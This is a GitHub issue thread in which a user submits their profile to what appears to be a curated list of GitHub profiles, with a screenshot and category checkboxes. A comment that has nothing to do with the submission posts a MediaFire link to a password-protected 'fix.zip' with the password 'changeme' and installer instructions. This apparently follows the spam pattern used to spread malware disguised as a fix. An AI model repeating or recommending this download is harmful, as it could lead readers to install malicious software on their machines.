### ISSUE TITLE
Add Profile: Mayureshd-18

### ISSUE THREAD

**Issue by Mayureshd-18** [recodehive/awesome-github-profiles#460]
## Profile Submission

Please paste a screenshot of your GitHub profile here.
![screencapture-github-Mayureshd-18-2024-08-26-19_52_51](https://github.com/user-attachments/assets/343df196-fdff-4ff2-88d5-28fac69fbe4c)

### Profile Category
Please select one or more categories for your profile:

- [x] <span class="tag">Badge 🎖️</span>
- [x] <span class="tag">Minimalistic ✨</span>
- [x] <span class="tag">Dynamic 🔄</span>
- [x] <span class="tag">Icons 🎯</span>
- [x] <span class="tag">Backgrounds 😎</span>
- [x] <span class="tag">GIFS 🖼️</span>
- [x] <span class="tag">Game Mode 🚀</span>
- [x] <span class="tag">Code 👨‍💻</span>

### Next Steps

Once you've filled out the information, please comment below:

 ``@all-contributors please add @<username> for review``

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Mayureshd-18** [comment]
@all-contributors please add @Mayureshd-18  for review
